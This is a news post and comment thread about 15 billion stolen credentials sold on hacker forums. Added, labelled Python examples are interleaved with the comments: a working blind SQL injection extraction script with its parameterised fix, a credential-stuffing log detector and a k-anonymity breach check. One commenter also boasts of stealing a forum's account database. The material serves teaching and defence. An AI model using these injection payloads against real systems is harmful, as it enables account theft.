posted by Fnord666 on Thursday July 09 2020, @07:42AM   Printer-friendly
from the get-your-hot-fresh-credentials-here! dept.

15 Billion Credentials Currently Up for Grabs on Hacker Forums:

Fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums – shedding light on the sheer scope of compromised credentials that are fueling account takeovers on the internet.

A report released Wednesday — "From Exposure to Takeover" by the Digital Shadows Photon Research Team — found that 100,000 separate data breaches over a two-year period have yielded a 300 percent increase in stolen credentials, leaving a veritable bonanza of account details on dark-web hacker forums up for grabs.

Most of the credentials are from consumers, and while many are sold on forums—for an average price of $15.43—many also are given away for free by hackers, researchers found.

[...] The credentials being flogged online vary in access and price, according to the report. They include usernames and passwords for everything from bank or financial accounts (which comprised 25 percent of the credentials analyzed) to video- and music-streaming services, to antivirus programs.

Unsurprisingly, credentials for bank and other financial accounts are also the most expensive to purchase, selling for an average of $70.91 apiece, researchers found. Indeed, data that puts potential financial gain on the table tends to be the most valuable to threat actors.

Data for accessing antivirus programs earned the second-highest price on hacker forums, at an average of $21.67. Threat actors apparently find access to media streaming, social media, file sharing, virtual private networks (VPNs) and adult-content sites far less valuable, with these credentials traded "for significantly under $1" on forums, according to the report.

While consumer credentials comprised the bulk of those researchers tracked, organizations are not immune to the risk of credential theft and potential reuse for nefarious purposes, particularly if financial gain is involved. The report uncovered 2 million accounting email addresses exposed online, with those referencing "invoice" or "invoices" the most commonly advertised on hacker forums, researchers said.


  • (Score: 0) by Anonymous Coward on Thursday July 09 2020, @08:51AM (1 child)

    by Anonymous Coward on Thursday July 09 2020, @08:51AM (#1018598)

    Now I have to change the combination on my luggage

    • (Score: 0) by Anonymous Coward on Thursday July 09 2020, @09:12AM

      by Anonymous Coward on Thursday July 09 2020, @09:12AM (#1018601)

      If you post your password, it appears as asterisks. Like this:

      notpassword
      Stillno
      ********
      Againnotpassword

  • (Score: 3, Insightful) by SomeGuy on Thursday July 09 2020, @11:42AM (3 children)

    by SomeGuy (5632) on Thursday July 09 2020, @11:42AM (#1018609)

    Safe and secure my fucking ass.

    This is why I never even signed up for online banking. Good luck hacking paper transactions. Unfortunately with all the stupid shit that has been happening lately there has been increasing pressure to do things the "One True online-cell-phone-blue-leds-consumertard way"

    • (Score: 1, Informative) by Anonymous Coward on Thursday July 09 2020, @07:37PM (1 child)

      by Anonymous Coward on Thursday July 09 2020, @07:37PM (#1018776)

      And then someone else signs up for online access to your accounts and you are wide open. It's not a theoretical risk, it's happened before.

      • (Score: 3, Touché) by shortscreen on Thursday July 09 2020, @09:07PM

        by shortscreen (2252) on Thursday July 09 2020, @09:07PM (#1018821) Journal

        Is that the new marketing pitch?

        "Download our app! ...Before someone else does on your behalf!"

    • (Score: 2) by el_oscuro on Saturday July 11 2020, @01:07AM

      by el_oscuro (1711) on Saturday July 11 2020, @01:07AM (#1019304)

      Of course, just because you aren't online doesn't mean your bank isn't. And its website is probably full of SQLi, CSRF, long forgotten servers exposed to the Interwebs, etc. Just make sure you use a good password manager and have unique passwords:

      https://xkcd.com/792/ [xkcd.com]

      --
      SoylentNews is Bacon! [nueskes.com]
  • (Score: 0) by Anonymous Coward on Thursday July 09 2020, @11:42AM (2 children)

    by Anonymous Coward on Thursday July 09 2020, @11:42AM (#1018610)

    ..antivirus creds?!

    • (Score: 3, Insightful) by looorg on Thursday July 09 2020, @12:33PM

      by looorg (578) on Thursday July 09 2020, @12:33PM (#1018622)

      I found this one a bit odd too. But I don't think they care or want them for their anti-virus properties. I would see it more as intel on a person or company, so you know what they are running so you can tailor future attacks on them better or to prevent or circumvent said protection. For most people just running MS Defender (or whatever it's called again) is probably good enough, and it's free.

    • (Score: 2) by The Vocal Minority on Friday July 10 2020, @05:22AM

      by The Vocal Minority (2765) on Friday July 10 2020, @05:22AM (#1018970) Journal

      Password reuse

  • (Score: 2) by looorg on Thursday July 09 2020, @11:50AM

    by looorg (578) on Thursday July 09 2020, @11:50AM (#1018612)

    Looks like this would contain a lot of dupes. There are fewer than 8 billion people alive on the planet and only about half of them use and have access to the internet. I guess some people/companies will be better or worse than others. That said, if there are multiple hackers selling them there is also the potential for duplicate information.

  • (Score: 2, Interesting) by Anonymous Coward on Thursday July 09 2020, @04:36PM

    by Anonymous Coward on Thursday July 09 2020, @04:36PM (#1018706)

    Hate to brag, but here goes.

    I remember once, in 2003 I think, I was bored one evening and hacked this Chinese forum with 3.something million accounts in the database I took a copy of.
    I don't speak that language, so I used it for the dictionaries and to exchange it for other databases.
    Note how the country I was living in at the time didn't have laws against that.

    It took about three minutes, no automated tools, no 0-days, just good old-fashioned blind SQL injection from a browser (it's a fun game to play)

    Moral of the story: you can make a database like that in a month or so, if you're average like me.

    And yes, it'll be full of dupes.

    And don't get me started on their pricing crap, this is lamers catering to lamers.

    Hackers share. Criminals monetize.
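
Blind SQL injection of the kind the comment above describes, and the SQLi that el_oscuro's comment further up expects a bank's site to be full of, as an added example that is not part of the original thread: a login query built by string concatenation, the yes/no oracle it leaks, a loop that recovers a stored password from that oracle one character at a time, and the parameterised query that stops the same payload cold. Everything here is constructed for the example (the in-memory SQLite table, the user names and the passwords). The passwords are stored as plaintext only so the extraction is visible in a few lines; a real service stores a slow, salted hash.

```python
import sqlite3

# Characters the extraction loop will try at each position (an assumption
# about the password alphabet; widen it for real targets).
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db():
    """Constructed sample table (not real data). Plaintext passwords are a
    deliberate simplification so the extraction below is visible; a real
    service stores a slow, salted hash instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Attacker-controlled strings are spliced into the SQL text, so a quote
    in either field changes the structure of the query."""
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Placeholders keep the input as data; the query structure is fixed."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_extract(login, conn, target_user, max_len=32):
    """Boolean-based blind injection: the only signal is whether login()
    returns True or False, which is enough to test one character of the
    target's password at a time with substr()."""
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in CHARSET:
            # Closes the username literal, injects a condition that is true
            # only when the character at `pos` matches, and comments out the
            # password clause ("--" starts a comment in SQLite).
            payload = (f"' OR (username = '{target_user}' AND "
                       f"substr(password, {pos}, 1) = '{ch}') -- ")
            if login(conn, payload, "x"):
                hit = ch
                break
        if hit is None:  # substr() past the end returns '', so nothing matches
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login, injected tautology:",
          login_vulnerable(db, "' OR 1=1 -- ", "anything"))
    print("password extracted via vulnerable login:",
          blind_extract(login_vulnerable, db, "admin"))
    print("same attack against parameterised login:",
          repr(blind_extract(login_safe, db, "admin")))
```

The point of `login_safe` is not that it filters quotes; it is that the database driver receives the SQL and the values separately, so no value can ever be parsed as SQL. Against it the payload is just a very odd username that matches no row, and `blind_extract` returns an empty string.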

  • (Score: 1) by hopdevil on Thursday July 09 2020, @04:58PM

    by hopdevil (3356) on Thursday July 09 2020, @04:58PM (#1018717) Journal

    Any account someone cares about should be protected with some form of multifactor auth. If the service (bank?) doesn't offer this option you are better off not using it.

    The whole credential "stuffing" meta is loud noise in the security space. Folks should focus on meaningful problems, like actually updating their services when they have known issues. But instead they pay whack a mole caring about crap like this, wasting their time.
    Who cares if you get billions of meaningless/forum passwords that probably aren't even valid anymore.
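
Credential stuffing, whatever one thinks of the noise around it, does leave a recognisable shape in authentication logs: one source trying many distinct usernames in a short window with almost nothing succeeding. As an added example (not code from the page or from any product), the detector below runs over a handful of constructed log lines in an assumed `<timestamp> ip=... user=... result=ok|fail` format. The thresholds are assumptions to tune per service, and the `took_over` list is the part a responder actually acts on, since the few successes from a flagged source are the accounts that need a reset and a look at their sessions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from any real system). Assumed format:
#   <ISO-8601 UTC timestamp> ip=<source> user=<username> result=ok|fail
# 203.0.113.5 walks a list of accounts; 198.51.100.7 is one user mistyping.
SAMPLE_LOG = """\
2020-07-09T11:42:00Z ip=198.51.100.7 user=alice result=fail
2020-07-09T11:42:01Z ip=203.0.113.5 user=alice result=fail
2020-07-09T11:42:02Z ip=203.0.113.5 user=bob result=fail
2020-07-09T11:42:03Z ip=203.0.113.5 user=carol result=fail
2020-07-09T11:42:04Z ip=203.0.113.5 user=dave result=fail
2020-07-09T11:42:05Z ip=203.0.113.5 user=erin result=fail
2020-07-09T11:42:06Z ip=203.0.113.5 user=frank result=ok
2020-07-09T11:42:07Z ip=203.0.113.5 user=grace result=fail
2020-07-09T11:42:09Z ip=198.51.100.7 user=alice result=ok
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$")


def parse_log(text):
    """Yield (timestamp, ip, user, result); lines that do not match the
    assumed format are skipped rather than crashing the detector."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["ip"], m["user"], m["result"]


def find_stuffing(text, window=timedelta(minutes=5), min_users=5, max_success=0.2):
    """Flag source IPs that, inside any `window`, hit at least `min_users`
    distinct accounts with a success rate no higher than `max_success`.
    Thresholds are assumptions; tune them to the service's normal traffic."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in parse_log(text):
        by_ip[ip].append((ts, user, result))

    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits in `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            users = {u for _, u, _ in span}
            ok = sum(1 for _, _, r in span if r == "ok")
            if len(users) >= min_users and ok / len(span) <= max_success:
                flagged[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(span),
                    # Accounts that actually let the source in: reset these.
                    "took_over": sorted({u for _, u, r in events if r == "ok"}),
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, info in find_stuffing(SAMPLE_LOG).items():
        print(ip, info)
```

Keying on source IP alone is the weak spot: stuffing run through a proxy pool spreads the attempts thin enough that no single address crosses `min_users`. The same sliding-window logic applied per user agent, per ASN, or to the global ratio of distinct usernames to successes catches that variant, at the cost of more false positives.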

  • (Score: 2) by krishnoid on Thursday July 09 2020, @08:20PM (2 children)

    by krishnoid (1156) on Thursday July 09 2020, @08:20PM (#1018803)

    They search for breaches like this, then allow you to run a security check [lastpass.com] on your usernames/passwords to see if any of them are included in a recent or older breach. If so, you can then change your credentials.

    Since the decryption code runs completely browser-side, your unencrypted per-site passwords ostensibly never cross the wire from you to them (someone verified this, but I can't find the article). Of course, if your account's been compromised in a breach, they send that password from the copy they're holding onto of the various breached data dumps, from their side to your browser to run the security check browser-side. I'm pretty sure that's how they do it.

    • (Score: 0) by Anonymous Coward on Thursday July 09 2020, @11:20PM (1 child)

      by Anonymous Coward on Thursday July 09 2020, @11:20PM (#1018871)

      Just keep on believing that... of course, faith is a prerequisite since you can't audit the LastPass code as you can with Keepass.

      • (Score: 2) by krishnoid on Friday July 10 2020, @02:21AM

        by krishnoid (1156) on Friday July 10 2020, @02:21AM (#1018930)

        Either faith or Wireshark + Chrome debugger, both are good options.
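
A way to check a credential against a breach corpus without handing the plaintext, or even the full hash, to the checking service, as an added example that is not the LastPass code the thread above is arguing about: the k-anonymity range query that the Have I Been Pwned "Pwned Passwords" API uses. The client hashes locally and sends only the first five hex characters of the SHA-1; the server returns every stored suffix in that bucket and the client does the match on its own side. The breach corpus here is a constructed three-entry dictionary, not real breach data, and `SERVER_SAW` exists only to show what the server side actually received.

```python
import hashlib

# Constructed sample breach corpus (not real breach data): a real service
# stores only the hashes and how often each appeared across dumps.
_SAMPLE_CORPUS = {"password": 3730471, "hunter2": 17043, "letmein": 241055}


def sha1_hex(password):
    """SHA-1 is used here purely as a lookup key for the corpus, not as a
    password storage hash."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


BREACHED = {sha1_hex(p): n for p, n in _SAMPLE_CORPUS.items()}

# Records every prefix the server received, to show that the full hash
# (let alone the plaintext) never crosses the wire.
SERVER_SAW = []


def range_query(prefix):
    """Server side of the k-anonymity scheme: return (suffix, count) for
    every stored hash that starts with the 5-hex-char prefix."""
    if len(prefix) != 5 or any(c not in "0123456789ABCDEF" for c in prefix):
        raise ValueError("prefix must be exactly 5 uppercase hex characters")
    SERVER_SAW.append(prefix)
    return [(h[5:], n) for h, n in BREACHED.items() if h.startswith(prefix)]


def check_password(password, query=range_query):
    """Client side: hash locally, send only the prefix, match the suffix
    locally. Returns how many times the password appeared in the corpus,
    0 if it is not there."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for candidate_suffix, count in query(prefix):
        if candidate_suffix == suffix:
            return count
    return 0


if __name__ == "__main__":
    for pw in ("hunter2", "correct horse battery staple"):
        print(f"{pw!r}: seen {check_password(pw)} times")
    print("server received only:", SERVER_SAW)
```

A five-character hex prefix gives 16^5 buckets, so against a corpus of hundreds of millions of hashes each query lands in a bucket of several hundred suffixes and the server cannot tell which one the client cared about. That is the property to verify with the Wireshark-and-debugger approach mentioned above: the request body should carry five hex characters and nothing derived from the rest of the hash.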

  • (Score: 2) by bzipitidoo on Friday July 10 2020, @02:15AM

    by bzipitidoo (4388) on Friday July 10 2020, @02:15AM (#1018928) Journal

    > particularly if financial gain is involved.

    There it is. Web site and data erasure vandalism might be fun and all, but in most cases it doesn't make the perps any money.

    A protection I rely on is not all this security theater, it's that most of my online accounts and activities aren't worth anything, that is, there's no way to get any money. Suppose someone hacked into my account here on SoylentNews, what could they do, really? Might be able to charge something to my credit card, but I trust SoylentNews doesn't keep that info. Right?

    I haven't reused passwords for a decade now, and never for anything valuable, so figuring out this one won't help break into any of my other accounts on other sites. Been about that long since I went through the accounts where I had reused passwords and changed them all. So if a site screws up and leaks my password, no big deal for me.
